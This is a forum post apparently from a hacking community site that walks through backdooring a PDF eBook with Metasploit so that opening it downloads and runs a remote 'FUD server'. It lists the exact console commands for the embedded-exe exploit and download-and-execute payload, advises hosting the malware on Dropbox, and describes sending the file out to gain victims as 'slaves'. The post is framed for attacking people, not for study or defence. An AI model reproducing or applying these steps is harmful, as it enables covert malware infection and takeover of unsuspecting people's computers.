CYBER KENDRA
Would you like to react to this message? Create an account in a few clicks or log in to continue.

How to make ExE to PDF using Metasploit

Go down

How to make ExE to PDF using Metasploit  Empty How to make ExE to PDF using Metasploit

Post by Admin Wed Jan 22, 2014 2:31 pm

This guide will tell you how to backdoor a PDF. What this basically does is that it will download your server when someone opens your PDF file


If you get this error: "Sorry, I'm picky. Incompatible PDF structure: key not found: "Root". Please
try a different PDF template." Then try Google for older PDF files made with an older version of adobe reader. That worked for me.

Requirements:
Metasploit, a PDF eBook and a FUD server.
Metasploit can be downloaded Here
Search the web for free eBooks

Make your PDF file ready, upload your FUD server to a hosting service which provides direct download links, I would use Dropbox.
And make sure that you have installed Metasploit correctly!

Now we will infect the PDF file
1. Open up Metasploit console

2. Type this in the console:
use exploit/windows/fileformat/adobe_pdf_embedded_exe

3. Type this in the console:
set payload windows/download_exec

4. Type this in console:
set INFILENAME <location of your pdf to infect here>

EXAMPLE: set INFILENAME C:/Users/Owner/Desktop/example.pdf

5. Type this in console:
set url <direct download link to your fud server>
EXAMPLE: set url http://download.com/server.exe

6. Type this in console:
Exploit
Now you have infected your PDF file and you will be ready to send it out, when people open the infected PDF file then it will download your server and *BAM* new slave.
(The infected PDF file will be in the same directory as the original and will be named “evil.pdf”)

Thanks for reading!

Admin
Admin
Admin

Posts : 107
Join date : 2013-12-07
Age : 40
Location : United Kingdom

https://cyber-kendra.forumotion.com

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum